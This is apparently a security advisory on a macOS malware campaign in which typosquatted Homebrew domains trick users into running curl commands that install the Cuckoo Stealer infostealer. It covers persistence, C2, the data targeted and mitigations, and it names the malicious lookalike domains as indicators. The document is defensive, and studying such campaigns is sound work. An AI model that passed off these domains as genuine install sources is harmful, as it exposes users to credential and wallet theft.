The ClickFix campaign is a targeted malware operation against macOS users that exploits typosquatting on domains resembling the legitimate Homebrew package manager websites. Attackers register multiple lookalike domains such as homabrews.org, brewmacos.com, and brewsh.cx to trick users into downloading and executing malicious scripts via curl commands. Once executed, the payload deploys the Cuckoo Stealer malware, an infostealer designed to exfiltrate sensitive user data. Cuckoo Stealer achieves persistence by installing itself as a LaunchAgent, a common macOS persistence mechanism, allowing it to run on system startup. It bypasses macOS Gatekeeper, which normally restricts unauthorized software execution, likely through code signing abuse or exploiting system weaknesses. The malware communicates with its command-and-control (C2) servers using encrypted channels, complicating detection and analysis. It targets a broad range of sensitive information, including browser-stored credentials, cryptocurrency wallet data, and detailed system information, enabling attackers to conduct credential theft, financial fraud, and further system compromise. The infrastructure supporting the campaign is distributed across multiple domains hosted on shared IP addresses, suggesting a coordinated and adaptable threat actor group. The attack relies heavily on social engineering, exploiting users’ trust in Homebrew and command-line installation methods, requiring user interaction but no prior authentication or elevated privileges. Indicators of compromise include specific malicious domains, URLs, and file hashes associated with the campaign. The campaign is linked to CVE-2026-25253, though no known exploits in the wild have been reported. The medium severity rating reflects the balance between the significant data exfiltration potential and the requirement for user execution of malicious commands.

This threat poses a significant risk to organizations and individuals using macOS systems, particularly those who rely on Homebrew for software installation. The exfiltration of browser credentials and cryptocurrency wallets can lead to financial losses, unauthorized access to corporate and personal accounts, and identity theft. The persistence mechanism allows long-term unauthorized access, increasing the risk of further exploitation or lateral movement within networks. The bypass of Gatekeeper reduces the effectiveness of built-in macOS security controls, potentially undermining user trust in system protections. Organizations with developers, IT staff, or power users who frequently use command-line tools are especially vulnerable. The campaign’s use of typosquatted domains increases the likelihood of accidental infection. The encrypted C2 communication complicates network detection and response efforts. While no widespread exploits are reported yet, the evolving infrastructure suggests ongoing active development and potential for escalation. The overall impact includes compromised confidentiality, integrity, and availability of sensitive data and systems, with potential reputational damage and regulatory consequences for affected organizations.

Organizations should educate macOS users, especially developers and IT personnel, about the risks of executing commands from untrusted sources and the dangers of typosquatted domains. Implement strict policies to verify URLs and scripts before execution, including using official Homebrew installation instructions from verified sources. Employ endpoint detection and response (EDR) solutions capable of detecting persistence mechanisms like LaunchAgents and anomalous network communications. Monitor DNS queries and network traffic for connections to known malicious domains and IP addresses associated with this campaign. Utilize application whitelisting and macOS security features such as System Integrity Protection (SIP) and notarization enforcement to limit unauthorized software execution. Regularly audit installed LaunchAgents and running processes for suspicious entries. Deploy network security controls to inspect and block encrypted C2 traffic where possible, using SSL/TLS inspection with appropriate privacy considerations. Encourage use of multi-factor authentication (MFA) for critical accounts to mitigate credential theft impact. Maintain up-to-date backups and incident response plans tailored to macOS environments. Finally, track threat intelligence feeds for updates on this campaign and related indicators to enable timely detection and response.